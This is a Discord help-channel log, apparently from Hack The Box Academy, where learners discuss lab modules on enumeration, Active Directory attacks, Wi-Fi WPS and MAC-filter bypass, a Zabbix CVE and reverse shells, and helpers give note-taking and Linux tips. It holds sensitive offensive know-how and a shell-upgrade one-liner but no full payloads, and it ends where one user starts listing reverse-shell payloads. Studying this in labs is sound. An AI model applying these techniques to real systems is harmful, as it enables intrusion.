#modules

1 messages Β· Page 366 of 1

ashen pollen
#

No admin page

#

nevermind

#

WOW

cunning frigate
#

For example likely cross site scripting won't allow to read a file or run commands

ashen pollen
#

i got in with basic creds..

fathom pendant
#

it's the getting started module, they won't have you do anything overly complex to get the answer

ashen pollen
#

its CMS 3.3.15

#

PHP Version 7.4.3 - OK
cURL Module Installed - OK
GD Library Installed - OK
ZipArchive Installed - OK
SimpleXML Module Installed - OK
chmod chmod - OK
Apache Web Server Apache/2.4.41 (Ubuntu) - OK
Apache Mod Rewrite Installed - OK

#

Im thinking about a reverse shell for the php maybe?

#

But i already have admin creds so idk

fathom pendant
#

well admin creds for the website

#

not for the box in and of itself πŸ˜‰

ashen pollen
#

mm yes

fathom pendant
ashen pollen
fathom pendant
#

you can instead just do msfconsole -q then run a search in that

#

then you just use #

ashen pollen
#

i have msfconsole open in another terminal already

#

I was planning to try to do a HTTP attack at first

fathom pendant
#

why?

ashen pollen
fathom pendant
#

yes, but why

ashen pollen
#

seemed to be a interesting way to attack as supposed to what i did

ashen pollen
fathom pendant
#

everything you need to know to attack this box was taught to you by the module

ashen pollen
fathom pendant
#

knowledge checks and skill assessments rarely deviate from what was taught/shown to you

fathom pendant
ashen pollen
fathom pendant
#

you should

#

notes are an important part of your toolkit

ashen pollen
#

I never was a note taker and i don't really know how too

fathom pendant
#

basics of note taking:

  • rewrite in your own words
  • highlight/mark anything you may not know
  • do additional research for clarity
  • make sure that you understand your notes
#

copy/pasting is useless if you still don't understand it

#

using a note-taking app like Obsidian you can also put images/screenshots in it to further strengthen your notes with the clear example of what you did

#

it can also be important to take note of if/when you run into errors, what your error was and what it looks like

#

and how you resolved

cunning frigate
#

You can use notion or obsidian and there are tons of resources online how to take notes for stuff like oscp or cyber generally

fathom pendant
#

but this is a field where not taking notes can have you spending hours looking for that one obscure stackoverflow article about some guy named denvercoder49 having the same issue as you with resolution.

#

consider your notes like a grimoire of knowledge.

#

as you use certain commands more often than others you'll get muscle memory for their syntax

#

i remember needing to look up the syntax a handful of times for xfreerdp /v:$TARGET /u:$TARGET-USER /p:$TARGET-PASSWORD /dynamic-resoution /drive:tools,/path/to/tools/ /cert-ignore

#

or python3 -c 'import pty; pty.spawn("/bin/bash")'

#

good notes will serve as a foundation for further learning as when you run into something later, you'll have something to refer to if you forgot what something is

#

as the tier 1 and 2 modules won't repeat the basic knowledge from tier 0

#

for instance these are the recommended modules to have a grasp of before doing the 'getting started' module

orchid furnace
#

Hi i am currently in the learning process model , I tried finding some ressources about the ROQ relationship oriented question model to understand it better but I failed finding such, as any search result either video or google does not give ROQ like if it only exists in htb, I hardly understand how to apply ROQ in everyday life without further examples than the one used on htb which talks about the methods we can use to access windows remotely, please help

waxen totem
#

I personally prefer drawing mind maps instead of writing notes because a picture is worth a thousand words and it also helps me visualize how I think about the concepts

waxen totem
dim hound
#

Does someone else these warning also when executing cme?

hallow kiln
#

use netexec

#

cme is no longer maintained, so there will only be more errors going forward

dim hound
#

aw cool! 😁 I am going to use that one instead

brave scroll
#

Attacking Common Services - Medium

Have done NMAP Scan manytimes, but when read forum, i come to know port 30021 is running ftp, but can anyone tell me how can i know on which it is running if i don't want to take forum help.

#

I hope someone got my point what i am trying to say

toxic apex
#

has anyone figured out how to make krbrelayx.py work on the current pwnbox? It just always complains about getting the wrong auth type and never saves a TGT. no matter how it is installed, what version of impacket you use, even if you rm -rf your python lib folder and reinstall it.

hallow kiln
brave scroll
hallow kiln
#

this once again isn't scanning all ports

brave scroll
hasty mauve
brave scroll
#

are u sure doing this is a good practice?

hasty mauve
hallow kiln
#

for the course and boxes, yes, for real life, not really

rugged linden
#

hi can i ask are we supposed to follow along the website instructions for the informaiton security foundations modules, setting up section?

fathom pendant
#

You don't have to

#

It's more of a reference than a guide

rugged linden
#

oh okay, thanks

#

i was confused as when i opened the instance there were files i could not find as shown in the website

fathom pendant
#

Well the instance isn't gonna really have what's shown

#

As that's an in-browser vm

#

Already configured

rugged linden
#

understood, ty

ocean night
#

What's this from?

glad patio
ocean night
#

Ok, please don't repost content from modules over Tier 0

#

Ask your question without the screenshot πŸ™‚

glad patio
# ocean night What's this from?

I've already found the answer by looking at the structured logs on the screenshots. Yet, I don't know how to order my output to get the same answer

glad patio
ocean night
#

np πŸ™‚

west zodiac
#

From Footprinting, Domain Information, DNS Records

I was running DNS command but it was not working and cant query my dns server and it returned this:
dig any inlanefreight.com

;; Connection to 192.168.204.2#53(192.168.204.2) for inlanefreight.com failed: timed out.
;; no servers could be reached

Then i ran and it showed:
dig any inlanefreight.com @ 8.8.8.8

; <<>> DiG 9.20.2-1-Debian <<>> any inlanefreight.com @ 8.8.8.8
...
;; ANSWER SECTION:
inlanefreight.com. 300 IN A 134.209.24.248
...
inlanefreight.com. 300 IN SPF "v=spf1 include:_spf.google.com include:mail1.inlanefreight.com include:google.com ~all"

;; Query time: 184 msec
;; SERVER: 8.8.8.8#53(8.8.8.8) (TCP)
;; WHEN: Tue Dec 24 19:21:30 PKT 2024
;; MSG SIZE rcvd: 368

So the question is am i missing out any data if im doing it the second way. Is it ok to normalize using @ 8.8.8.8 everytime i use dns command. Ive confirmed from gpt its fine but need second opinions.

fathom pendant
#

What module and section are you working on?

#

If it's a private ip you use the ip as the @ i.e. dig axfr inlanefreight.htb @10.129.0.5

#

Otherwise it uses your default dns configuration

#

Usually through your isp

fathom pendant
#

But if it's a public website using any nameserver as the @ is fine

west zodiac
#

Ok i understand, thank you for your time.

fathom pendant
lofty crag
#

If the tier of a module is not based on its difficulty, what is it based on?

acoustic owl
#

I do think that the tier level classifies the difficulty. Why do you think that's not the case?

lofty crag
lofty crag
#

Last sentence in the screenshot above

alpine pond
#

hi guys,
Has anyone experienced firewall issues in the MSSQL, Exchange, and SCCM Attacks (Introduction to SCCM) module?

proper hare
#

hey guys, i got an issue in this question i don't know what is the password a bypassed the filter but i don't know the password i tried to hack it but there is no clients on it:

Execute the MAC Filtering bypass as demonstrated in the section to establish a connection to the 5 GHz band. Once connected, locate the flag at IP address 192.168.2.1.

#

btw why i can not send an image ?

cloud urchin
umbral badger
#

What could cause the eror running parrot here

proper hare
umbral badger
#

and helllo

storm elk
ocean night
#

Because I see lots of information out there

#

(I don't know how to solve this directly)

umbral badger
#

It said that may be CPU storage issues

ocean night
#

Did you find any articles that described this problem?

#

There are.. loads of links there

#

Literally Googling the error message

#

I can't say any of them will help, but I'm just saying.. there's quite a bit of info out there describing this issue, and potential solutions

#

Have you tried any of them?

autumn cradle
#

Hello,
Is it normal that all machines are down for the Linux privilege escalation module (the Miscealnous Technique & Kernel Version part). Impossible to maintain a connection in SSH more than 2 minutes. I've had this problem since yesterday. I tried with the online PWNBox and also vpn from my PC.

ocean night
#

You likely have more than one VPN connection open at the same time

#

Close any Pwnbox instances, and reboot your PC

sonic seal
#

Does anyone help me with my mistake?

dapper moth
sonic seal
naive cedar
sonic seal
#

Now is it better?

proper hare
dapper moth
plush lotus
#

trying to find all installed packages on target. the number is incorrect. i searched for dpkg.

#

also have not figued out how to take screen shots on parrot os

gentle carbon
#

I recall coming across a GitHub repository in one of the modules that contains benign Windows files useful for writing YARA rules. I checked the YARA & Sigma module but couldn’t find the link. Does anyone else remember or know where to find it?

sonic seal
hasty mauve
sonic seal
cobalt aspen
#

Module: AD Enumeration And Attacks
Section: DCSync
Am i the only one facing this issue? I reseted machines multiple times, and changed vpn server.

rustic sage
#

Hi everyone

cobalt aspen
#

I will just do this section via Windows machine

#

Ssh also didnt work

#

I could run ligolo agent on windows machine also

fervent hull
#

Where can i add image to the chat?

fathom pendant
#

You need to link your htb account via #welcome

fervent hull
#

i got this error Identification error: please contact an online Moderator or Administrator for help.

plush lotus
#

having and issue here

fathom pendant
#

Then reach out to a mod [the people with shields next to their name]

cloud urchin
#

how's this work? how do i have a 1 year mark a month ago but 2 year mark 9 hours ago?

fathom pendant
fathom pendant
plush lotus
gusty bronze
#

Hii everyone

#

Friends i am new

fathom pendant
plush lotus
#

ok

fathom pendant
#

I'm gonna go out on a limb and assume you chatGPTed it

fathom pendant
#

The command i gave grabs the list of installed tools; cuts out a line which is unnecessary; then counts it

gusty bronze
#

Any hacker here ??

plush lotus
gusty bronze
#

Any HACKER here ??

fathom pendant
#

Not from repo

fathom pendant
gusty bronze
#

Whats going on can you please explain md

#

I am new

fathom pendant
#

Yeah but why do you need a "hacker"?

#

If you want to start learning

compact patrolBOT
gusty bronze
#

Are you hacker ?

fathom pendant
#

What is your actual question

gusty bronze
#

I will go but can you tell me

fathom pendant
#

Why does it matter

gusty bronze
#

I am a Indian guy and i am new in Hackthebox, i want to be a hacker

compact patrolBOT
gusty bronze
#

Thanks

#

any more suggestions

#

???

fathom pendant
#

Learn your basics.

gusty bronze
#

Ok

fathom pendant
gusty bronze
#

Are you a pro hacker, how long did it take

delicate steeple
#

Hey everyone merry x mass!
if someone has the time to help me out with
Attacking Common Services
Attacking Email Services

i am a the question

What is the available username for the domain inlanefreight.htb in the SMTP server?

i have tried using patator,hydra and smtp-user-enum with the users and pw given by htb

i seem to not be able to find the user, can someone nudge me in the right direction?

plush lotus
#

apt list --installed | grep -iv listing | wc -l ok so when i used grep -c | wc -l no results i am confused why you used -iv when i looked up /man grep.... it did not list that as an option

plush lotus
# fathom pendant Learn your basics.

apt list --installed | grep -iv listing | wc -l ok so when i used grep -c | wc -l no results i am confused why you used -iv when i looked up /man grep.... it did not list that as an option

fathom pendant
#

Many commands you can combine the arguments

gusty bronze
#

How can i hack a nearby wifi network, can anyone guide me

fathom pendant
#

Like nmap -sS -sU -sV can be combined to -sSUV

plush lotus
plush lotus
fathom pendant
#

Do this apt list --installed | head

#

And you'll see what you may or may not need to inverse grep (-v)

plush lotus
fathom pendant
plush lotus
#

but the answer was in the ___ range this only shows a few

safe star
fathom pendant
#

You don't pipe that to wc

plush lotus
fathom pendant
#

You pipe apt list --installed

#

Now you understand the need for the grep -iv [use man grep to figure out what those options do]

delicate steeple
fathom pendant
#

Yeah smtp is a slow service

plush lotus
fathom pendant
#

man <command> and <command> --help are your biggest friends

plush lotus
fathom pendant
#

Β―_(ツ)_/Β―

#

Often if I'm asking why youre doing something a certain way, I'm challenging you to think why you did something (often wrong)

rough violet
#

learning about /dev/null

fathom pendant
#

And to ask the question "wait how do I <do thing>?"

fathom pendant
rough violet
#

honestly it's a heavy load of new information in the linux fundamentals module,
it's what I need to learn linux but damn how am I supposed to learn all that it would take me a lot of time

rough violet
fathom pendant
#

Typically pipes only redirect stdout, not stderr without prodding

rough violet
fathom pendant
#

Tbh I don't have deep notes of linux filesystem stuff

fathom pendant
#

Just what I typically need to know

plush lotus
#

i am in this mod right now

fathom pendant
#

Such as
/dev/ < devices
/home/ < users
/root/ < magical wonderland

plush lotus
#

its the first one i went to

fathom pendant
#

Also remember, the only person that needs to understand your notes is you

#

So however you feel you need to organize is up to you

eternal warren
#

Abi

eternal warren
#

Hi

fathom pendant
#

Also a recommendation is to go back every now and then to readjust your notes

#

I.e. rerun a module you completed and readjust your notes

eternal warren
#

Hi

#

Who wants to do this? cipher text

fathom pendant
#

We're not gonna reverse a random b64 string from some nobody

#

<@&861185840277487616>

#

It was deleted the first time,that should have been your hint that it doesn't belong here

plush lotus
eternal warren
#

Hey marcielee Add me I'll send you something

fathom pendant
eternal warren
eternal warren
dark hedge
#

and stop bothering them

fathom pendant
eternal warren
fathom pendant
eternal warren
#

Ok bro

fathom pendant
#

Take the hint

dark hedge
fathom pendant
#

@plush lotus don't dm without asking

delicate steeple
fathom pendant
#

~25 seconds seems to be the most reliable

delicate steeple
#

i did 5 i will try 25

pine dune
#

Hi guys, wanted to ask if whether in the cbbh pathway, does it cover some sort of linux/windows priv escalation as to my knowledge 99% (if not 100%) of the boxes on htb require some sort of privilege escalation. If cbbh doesn't cover this, then should we complete it and then go over to complete linux/windows priv escalation?

acoustic owl
#

CBBH refers only to the website, not to the server. PrivEsc on the server is not an issue for CBBH

fathom pendant
pine dune
pine dune
fathom pendant
#

It's enough to get your foot in the door and google fu the resy

fathom pendant
#

Rest*

acoustic owl
delicate steeple
plush lotus
#

ok i have a feeling i was suppose to do the networking fundamentals pior to linux.

fathom pendant
#

Networking fundamentals is just networking 101 stuff

plush lotus
fathom pendant
#

Basics of private, public, and CIDR ranges

plush lotus
#

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
how do you explain this question

fathom pendant
#

It's asking; how many services are listening [i.e. a web service], excluding IPv6 and localhost [127.0.0.x]

plush lotus
# fathom pendant `netstat` is helpful

what is blowing my mind is in the lesson it never once mentioned that. it talking about | more | less | head | tail | sort | grep | cut | tr | column | awk | sed | wc

fathom pendant
#

Yeah some of the sections seem out of order

plush lotus
#

a little.

fathom pendant
#

But this is pretty simple stuff tbh

#

netstat < network statistics

#

For basic commands try and have ways to memorize them

#

ls list stuff

#

mkdir make directory

plush lotus
#

in understand it is suppose to be simple. but how do i go about learning this without always asking for help. should i skip a lesson to see if the next one leads a hint since its out of order

opal nexus
#

In 'Attacking Wi-Fi Protected Setup (WPS)' module --> 'Online PIN Brute-Forcing Using Reaver' section - the reaver bruteforcing should take some time?

fathom pendant
#

"How do I do X in linux"

#

And asking for help isn't bad, it's how you ask for help that can be an issue.

#

If you're just asking for answers you're not learning anything

#

It's why giving vague but direct enough hints usually tips people in the right direction

plush lotus
fathom pendant
#

Google isn't a boogeyman

plush lotus
#

hah

fathom pendant
#

Again asking for help isn't a negative

#

We all start somewhere

#

A couple years ago I wouldn't have known wtf to do with an nmap scan

plush lotus
cloud urchin
#

i would wager marcielee feels the same way i do, but i enjoy helping people who want to learn. the key is you need to put effort in, but if you do and you're just banging your head against the wall and need a nudge or explaination, you're not a pester at all. just make sure you put in your effort.

fathom pendant
#

It's why we push people to use module and section name

#

Your confusion on something is almost guaranteed to not be original

plush lotus
fathom pendant
#

Ctrl-f on desktop. Magnifying glass icon on mobile

plush lotus
#

perfect i will use all resources. thank you.

opal nexus
#

Did You solve this thing eventually?

When I run the Reaver bruteforce It get stuck on the beacon part..

cursive marsh
#

Guyss I desperately need your help, I have been fighting the "Intro to Academy's Purple Modules" for 5 hours now, and I can't figure it out:
Usage Example: Zabbix CVE-2024-22120

Academy says:
Let's navigate to the bottom of this section and click on 'Click here to spawn the target system!'. Then, let's SSH into the target IP using the provided credentials. The vast majority of the actions/commands covered from this point up to the end of this section can be replicated inside the target, offering a more comprehensive grasp of the topics presented.

But there is no credentials provided in the whole page.

dark hedge
#

should be at the bottom of the page where the questions are, if there are any questions

cursive marsh
#

This is all

#

Or I am like blind blind

real chasm
#

Try and refresh the page maybe...

cursive marsh
#

Already done that, it's driving me crazy at this point

real chasm
#

Damn

cursive marsh
#

Like it says connect trough SSH

#

But it just doesn't give me ANY credentials to SSH

fathom pendant
#

:)

opal nexus
cursive marsh
fathom pendant
#

Sometimes they'll drop credentials in the first sections

cursive marsh
#

Just this

fathom pendant
cursive marsh
#

And this, but no clue what they mean by "administrator role" for now:

fathom pendant
dark hedge
fathom pendant
#

But could be linux

#

Ah those creds are for the web page

cursive marsh
fathom pendant
cursive marsh
#

No way, I read that part yesterday I fear the worst

dark hedge
#

not sure then, haven't done the module myself

fathom pendant
#

Oh

cursive marsh
fathom pendant
#

You're massively misunderstanding something

cursive marsh
#

It's just a skill issue in this case, and trust me, I've been struggling for over 3 hours this time

fathom pendant
cursive marsh
#

Oh yea, I've already done that part haha

#

Thank you big time bro, you saved me a LOT of headache

fathom pendant
#

You should be able to just run the cve.py

#

Amd get rce

#

Β―_(ツ)_/Β―

cursive marsh
#

Just as the current user, tried privesc but wasn't able to

#

I did sudo -l and it said I had vim permission NOPASSWD, but if I ran vim in the shell, it just timed me out

fathom pendant
#

Yeah you need an interactive shell to use vim

#

But you shouldn't need to privesc afaik

cursive marsh
#

I had no access to the root folder where the txt was located at tho

fathom pendant
#

Β―_(ツ)_/Β―

zealous rune
#

hi i'm struggling my way through the skills2 assessment on Attacking AD. I've managed to obtain a hash for mssqlsvc, but I cannot get a cleartext password. Looking at the solution I see that it's possible to get the cleartext password for this account. Am I missing something?

plush lotus
#

Determine what user the ProFTPd server is running under. Submit the username as the answer.

dark hedge
#

it's not

zealous rune
#

phew!

rough violet
#

so guys, writing a command in the stdin doesn't work? gotta only provide files for stdin?

#

first command is actually irrelevant, i wrote before it echo "test" > test.txt

delicate steeple
rough violet
#

aight go the EOF part

#

now I want to know: does stdin allow commands, or only files?

#

apparently it doesn't allow commands cuz bash is expecting a file or directory

fathom pendant
#

Single < is read file

rough violet
ripe wadi
#

hi guys

ocean night
#

@ripe wadi there will be a spawn target button with the questions

#

Don't just paste the question from the section

#

You are meant to find the answer yourself, using the skills learned in the sections completed previously

ripe wadi
#

yeah bu the point is that i haave to enum a domain

ocean night
#

Yes

ripe wadi
#

what does the target have to do with this

ocean night
#

So, what did you learn about techniques on enumerating domains in the previous sections?

ripe wadi
#

like use it as a nameserver >

ocean night
#

Yes

fathom pendant
ripe wadi
#

oh

#

i see

fathom pendant
#

Critical thinking is required to be successful

ripe wadi
#

they could have said it 😭

ocean night
#

It says target

ripe wadi
#

that is not critical thingking its a random ip

ocean night
#

We do accept feedback mind

fathom pendant
#

They're assuming {{ braincell -gt 1}} Kappa

ripe wadi
ocean night
#

How would you better present it?

fathom pendant
pine dune
#

Hi guys, Im gonna do a htb study sesh in a little while, and listen to some music. If anyone wants to join me, pls dm

ripe wadi
zealous rune
fathom pendant
#

If there's no explicit instruction to ssh/rdp/remote into a target, then it's not necessary

ripe wadi
ocean night
#

When given a target, think to what services you have been working on

#

..and learning about

fathom pendant
plush lotus
#

@fathom pendantDetermine what user the ProFTPd server is running under. Submit the username as the answer. how do i find the sever

ripe wadi
#

just swap the text on a page

fathom pendant
ocean night
#

Everything is simple when you are not the one making the change

ripe wadi
#

ok anyway, thanks

fathom pendant
ocean night
#

Good luck!

ripe wadi
fathom pendant
#

ps is good for processes

fathom pendant
ocean night
#

Again, everything is simple when you're not the one making the change

#

Yes, it should be simple

#

but it's not just the frontend work

#

addition of a DB field

#

populating all section questions

fathom pendant
#

Not to mention change reviews and such

ocean night
#

Appreciate the suggestion though

#

I'll pass it on

fathom pendant
#

Most people don't have issues understanding target would == nameserver in this instance though

ripe wadi
#

just curious

ocean night
#

What?

fathom pendant
#

How it interacts with the backend is

ripe wadi
ocean night
#

I'm not going in to specifics of the codebase

#

Just.. please

#

I've been doing this for long enough

ripe wadi
#

ok

ocean night
#

Thank you for the suggestion

ripe wadi
#

fair, thanks for the help again

fathom pendant
#

Not necessarily, and without knowing the specifics of the codebase [as gob said] it's easy to go "just change this for this one specific instance"

plush lotus
delicate steeple
ripe wadi
ocean night
#

I didn't realise I was doing social engineering

#

but thanks, I guess

fathom pendant
ocean night
#

πŸ˜…

fathom pendant
#

By getting you to talk about the codebase

#

I guess

#

Β―_(ツ)_/Β―

ocean night
#

That.. was meant to be social engineering?

#

Oh god whatever

ripe wadi
#

bruh

ocean night
#

Enjoy the module!

#

Not mad

#

Just tired

#

hahah

fathom pendant
#

I read your replies as broad things that need to happen for a module to be updated

#

Β―_(ツ)_/Β―

plush lotus
fathom pendant
plush lotus
#

thats the modual i am in

fathom pendant
#

But why would you use locate to search for a substring

plush lotus
#

this is why am i am confused in finding the answer. the past three lessons has had nothing but how to locate files

fathom pendant
#

grep searches for substring within files/output

#

echo -E "foo\nbar" | grep "foo"

#

To extend ps [options] | grep -i proftpd

#

-i ignores case

#

It's useful if you're unsure how the output would format or if you're looking for multiple instances where the word may be case shifted

#

locate is useful for finding files [if they are cached for locate to pull]

gray yacht
plush lotus
zealous rune
#

no i didn't need the password was able to use the hash and progress

#

however the solution suggested the password was obtainable and I wondered if I had missed something

gray yacht
zealous rune
#

I find it useful to check as sometimes i did things different to the solutions in the questions

#

i learn stuff forom the solutions too

gray yacht
fathom pendant
rough violet
#

guys is WEP still used?
isn't it replaced by WPA encryption?

ocean night
#

I really hope not.. but no doubt there will be some out there

#

"if it works don't fix it"

#
WPA3: 28,562,179 (1.92%)
WPA2: 1,109,295,965 (74.66%)
WPA: 38,442,957 (2.59%)
WEP: 42,346,020 (2.85%)
????: 237,250,229 (15.97%)
None: 30,655,313 (2.06%)
#

42 Million is.. quite a lot

#

How many are still active, who knows

cloud urchin
#

https://wigle.net/ this page has always been interesting to me, it shows a graph over time of encryption types for the uploaded stats.

rough violet
ripe wadi
#

btw guys how can i use the vpn in htb academy

#

My current situation is

#

i have a config file i have downloaded from the page

cloud urchin
#

use it with openvpn

ripe wadi
#

and ran sudo openvpn --config ./academy-regular\(5\).ovpn

#

and after trying to reach tthe target ip

#

it says that it is down

cloud urchin
#

don't run the vpn and pwnbox at the same time. your command might work idk. i just use openvpn <file> &

cloud urchin
#

your pwnbox and the vpn share the same ip, so you can't run them at the same time without running into problems. one or the other.

ripe wadi
#

ok

#

i terminated it

#

should i restart the vpn or target ?

cloud urchin
#

not sure, if it doesn't work still probably a good idea.

plush lotus
# ripe wadi ok

i had this issue as well. delete all vpn downloads from htb.

ripe wadi
#

from my pc or is there some panel in the website

plush lotus
plush lotus
ripe wadi
#

yeah

#

ofc

plush lotus
#

then delete all files in the downlads file for htb

ripe wadi
#

ok

#

thanks

plush lotus
#

sudo openvpn ~/Downloads/academy-regular.ovpn@ripe wadi you can thank @fathom pendant for this resolve

plush lotus
cloud urchin
#

the issue is you can't run the pwnbox and vpn at the same time...

dark hedge
#

if you are using pwnbox, you don't use the VPN. it's already connected to the network

#

the VPN is for connecting to the HTB network on your own VM

ripe wadi
#

ok thanks

#

is there any other reason to use pwnbox

cloud urchin
#

if you can run a VM, i'd suggest doing that as the experience will be a lot easier. no reason other than preference or hardware limitations.

dark hedge
#

you don't have to create a VM, and it already has most tools you need. but you can always just make your own VM and install the tools you need

#

VM is the proper experience

rough violet
#

what does that mean

dark hedge
#

and it's probably what you'd be doing when you're doing engagements

dark hedge
#

regexes are basically used to find/filter for specific characters or phrases within some string

silk otter
#

Hey I am struggling on the CDSA module 'Windows attacks & Defense' Section PKI - ESC1. From what I am reading, the lab assumes we already have access to the PKI machine because it starts off with a windows screenshot using the CERTIFY tool. I do not get any instruction from the lab on how to access the machine until a bit down the page


Enter the password for eagle\htb-student:
Attempting to start powershell as user "eagle\htb-student" ...```

This again, is not a kali based command, so it does not work for me. I then go down a bit more towards the questions and get this information.

```Please wait for 7-10 minutes after spawning the target of the below questions before requesting/generating any AD certificates!

For improved RDP performance, it is recommended to first SSH to the kali host while enabling dynamic port forwarding, followed by an RDP connection to WS001 from your attack host utilizing proxychains.```

So i do just that. I SSH into the machine using the given credentials in the questions in the bottom with port forwarding. I successfully get in kali. Awesome. Now here is the problem. I try to xfreerdp into the windows machine and I get this error 

```[17:20:09:558] [8621:8621] [ERROR][com.freerdp.client.x11] - failed to open display: 
[17:20:09:558] [8621:8621] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.```

I have tried to use 'export display=[local ip]:0.0' to help the issue. Still didnt work. I have tried xfreerdp into both the kali and windows machines. Didnt work. I have tried SSHing into bothe machines, I cannot do that due to the windows machine not being pingable. Basically, I tried all sorts of combonations. I have been at this course for about 6 months and these are my final questions. If anyone can help me it would make my day. Thanks
rough violet
#

do u guys recommend any video resources to help with for example Linux Fundamentals module or any?
I get this field requires a lot of research and that means reading text but still it's better whenever there's visual media

cloud urchin
silk otter
cloud urchin
#

i just spawned the target and tried from my VM and had no issues using ssh or rdp to get into the target

silk otter
#

you sshed then rdp into it fine?

cloud urchin
#

i ssh'd into the target. i can also xfreerdp into the target.

#

from within the kali target you then rdp into ws001 according to the question

silk otter
#

yes

#

that is the part I cannot accomplish

#

the kali box is not an issue

cloud urchin
#

i just started typing xfreerdp into a terminal, and it autocompleted into exactly what was needed to remote in

#

so open a terminal on your target, then use xfreerdp to remote into ws001

silk otter
#

lol

#

ok

#

I cannot paste any images for some reason, but it is giving me the same error

#

when i ssh and when rdp into the kali machine

cloud urchin
#

so you rdp into kali, from within that session you open the terminal and can't xfreerdp? you get the same error? i'd try another region or reach out to support on the website

silk otter
#

so to clarify, I can get into the kali target. Its the windows target I am having trouble with

#

Can you do it from your end?

fathom pendant
silk otter
#

yes

fathom pendant
#

And i take it what you're having issues with is connecting to the ws001 from the 10.129.x.x kali machine

silk otter
#

I can get into the kali target but cannot get into the windows target from the kali target as directed

#

Yes!

cloud urchin
#

i used a vm, not the pwnbox, could be the pwnbox needs some configuration but i doubt it

silk otter
#

I have not used my own VM yet. I will try that

#

I think I have tried a different region in the past but I will try again jic

#

actually my bad

#

It isnt the same error when I rdp into both

#

wait what the hell... it worked.

#

THANKS!

cloud urchin
#

yup good luck

silk otter
#

unstable asl

tranquil axle
#

Hey, did you end up finishing the skill assessment of malicious documents?

rough violet
#

why is this the wrong answer

cloud urchin
#

it says ipv4 only

rough violet
#

"not on localhost & IPv4 only" shouldn't that mean ALL listening services? not just those?

cloud urchin
#

yeah i guess so

#

i don't recall that question so i probably haven't done that module sorry

#

i can see it both ways with the way the question is worded

rough violet
#

i did the command with the -4 for only IPv4, removed localhost with grep -v & worked

#

basically copy pasted command from google search actually

fathom pendant
rough violet
#

oh forgot to uniq or sort -u

#

limme try that

#

same number ??

fathom pendant
rough violet
#

i can't solve it

fathom pendant
#

Do some light editing to block out

rough violet
fathom pendant
rough violet
#

well, i added 1 to the sort -u and somehow that's the answer..

fathom pendant
#

I've linked a forum answer in the past that describes the commands used

#

.

ripe wadi
#

Is there a module on memory scanning, manipulation etc...

ocean night
#

The first is regarding forensics, the second regarding game hacking

#

They both have sections that cover memory, but of course forensics.. more on inspecting memory snapshots, game hacking, more on searching, structure and manipulation

ripe wadi
#

Thanks a bunch

fathom pendant
ocean night
#

There is the preview route

#

It could be possible to detect embed from Discord and rewrite to the public preview page

#

I agree, it's annoying

fathom pendant
#

I wonder if it'd be better to get a copyable preview link button πŸ€”

#

I believe the preview uses the module name though

plush lotus
#

Here are some optional tasks to practice regex that can help us to handle it better and more efficiently. For all exercises, we will use the /etc/ssh/sshd_config file on our Pwnbox instance. why can i not cd to this file

ocean night
fathom pendant
#

Regex is useful to learn tbh

#

But I still use cheatsheets

plush lotus
fathom pendant
#

It's under /etc/ssh directory

plush lotus
#

vm wont let me cd to the path

fathom pendant
#

Btw you can specify full filepaths for pretty much any commands

#

won't let me

#

Useful error

plush lotus
#

i did use full path

fathom pendant
#

Are you using the pwnbox or your own vm

plush lotus
#

pwnbox

fathom pendant
#

permission denied
You need to be root/use sudo

plush lotus
#

think i figured it out

fathom pendant
#

:))))

plush lotus
#

why cant i get into the sshd_config i stopped it at ssh/

fathom pendant
#

Because that is a file, not directory

#

πŸ™ƒ

#

As stated by the error

#

Just because it doesn't have a file extension doesn't mean it's a directory

plush lotus
#

haha ive been at this since 9 am think the wheel is turning and the hamster is dead

tranquil axle
#

Okay I managed to solve the skill assessment of malicious documents, but I’m pretty sure not the intended way. If someone finds a proper solution let me know lol

dapper moth
#

I totally forgot how the WriteDACL II SA was fun!
You'll get different stuff each time you do it and in different ways!

shut wraith
#

Hello I need helo on Intro to White Box Pentesting can I DM anyone

spare condor
#

AD Enumeration & Attacks - Skills Assessment Part II.
Can someone help me? What am I doing wrong?

plush lotus
#

ok so in REGex it only changes the color of the line of the syntax

safe star
#

DomainPasswordSpray wouldve been the better choice there

scenic geode
#

Hi guyz, I am working on solving a challenge NextPath (Medium difficulty Web Attack)

I wanted to know if I can get some assistance/hints on this part.
I am stuck at how to do directory traversal

spare condor
scenic geode
spare condor
safe star
plush lotus
dark hedge
#

to get access, verify your account -> #welcome

civic steeple
#

hey all, i'm currently revamping my notes as i go through the Pentesters Job Role. Question, I have the services in order from Footprinting and now i'm in the next module, Info Gathering- Web Edition and I'm curious to know if it makes sense to inforporate the DNS & Subdomain notes I'd take from Info Gathering and incorporate them into the notes for DNS in footprinting, thoughts?

#

Or is this entire Info Gathering process done after you've completed footprinting during a pentest and not really related

fathom pendant
safe star
#

just added it to what i had

civic steeple
#

As I came close to completing PA, I realized my notes were complete shit, now they're kind of shit

civic steeple
# safe star just added it to what i had

Would you say Footprinting and Attacking Common services mesh together? I assume footprinting touches on the services a bit more than Getting Started and ACS dives way deeper?

tranquil axle
civic steeple
tranquil axle
#

I started doing it by module at first too, but whenever I want to consult my notes it is because I found a certain service running on a host and I want to know what I can try. So I see β€œftp” and open my ftp notes to see everything, from anonymous login to bruteforcing to CVEs to things that I might’ve encountered in boxes

#

And then it doesn’t matter what module taught me how to brute force ftp, I just know that that’s an option for this service

civic steeple
#

right now i have everything in one note (in obsidian) but i'm making sure to give everything the proper heading so i can expand sections as needed but still be able to do a "Find" within everything

tranquil axle
#

I’m not sure about the perfect setup yet tbh. I used to have one more in obsidian that has each common port and what service is behind it and then linked to a separate note just for ftp

#

That works well for small services but once you reach AD there is so much to know about that alone that you’ll likely need a few pages just for that

#

And over time the things I would write down in my notes become so β€œcommon knowledge” to me that I probably wouldn’t write them down anymore today. For example I really don’t need a brute force section on every service because I just know I can always try to brute force and what tools to use

civic steeple
pearl hare
#

Hi everyone

tranquil axle
civic steeple
tranquil axle
#

I’ve done other stuff like prolabs that are not so time constrained

#

Realistically if you consider both attempts you have 20 days which should be plenty of time for everything

civic steeple
#

agreed

cerulean hinge
#

Hello,

I'm doing the attacking tomcat module. I have my webshell that I want to transform into a reverse shell but I can't manage to find a proper command.
I used various from the shell & payloads course or from cheatsheet I found online based on sh & bash binaries and also I tried to use python. Nothing worked.
Example of payloads :

